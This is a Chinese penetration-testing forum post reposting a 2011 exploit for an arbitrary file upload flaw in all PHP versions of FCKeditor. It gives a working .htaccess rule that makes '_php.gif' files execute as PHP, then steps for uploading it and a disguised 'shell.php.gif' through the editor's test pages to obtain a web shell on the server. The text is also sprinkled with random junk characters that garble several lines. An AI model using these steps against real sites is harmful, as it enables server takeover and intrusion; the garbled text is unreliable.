中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]

作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞# t$ M' y3 t8 T/ e6 h6 j
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07  P% g* d0 f0 Y5 r( ~0 O/ h
减小字体 增大字体1 I- c  t# L6 r; ~8 |& e
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
, S0 K7 \8 N- a[+] Date: 2011
) B: Y3 j( H6 G6 \4 C; A[+] Author : sinesafe.cn
5 p3 ?# C) t. \+ ?& N[+] Website : WwW.sinesafe.cn& j/ j8 Q6 ], w
———————————————————1 V, J0 M) \0 r" x/ W! c- |, v7 E
1.create a htaccess file:, n/ m, n2 o) Y7 K  v! d1 r' V
code:7 ?6 h9 ~! d* C( {
<FilesMatch “_php.gif”>
  w: Y2 ^- _/ e# I7 V, }) fSetHandler application/x-httpd-php2 @6 f5 O% Q6 i: e7 P9 }
</FilesMatch>& y5 B8 y  [- _
. J' X2 a6 C& Y, ?2 ?' q
2.Now upload this htaccess with FCKeditor.: D% z5 M4 H5 U2 z: B# h

# O2 ^4 n/ u8 J+ Uhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
  h2 x7 A* L% E, Q* ?0 f  h) I3 J& k+ i! Y8 A% ~6 x4 A
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html; O7 v1 C$ G' Q, I: L; |! t
' D1 z# k& j: W1 @4 c7 ~
———————————————————————————————-
6 I7 \$ J2 d5 s+ W' o3.Now upload shell.php.gif with FCKeditor.4 F- g. p# J5 y1 y9 T7 C& H- r- i
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.& t% n2 g$ E4 Y" }5 p) I# E) }
5.http://www.sinesafe.cn/anything/shell_php.gif
1 C3 ^; @, d2 J+ m3 r9 v+ A6.Now shell is available from server.
5 M- N$ j  T# {9 y
( [& h' U2 j) A0 ~

$ S2 ~# L; u5 y9 M




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2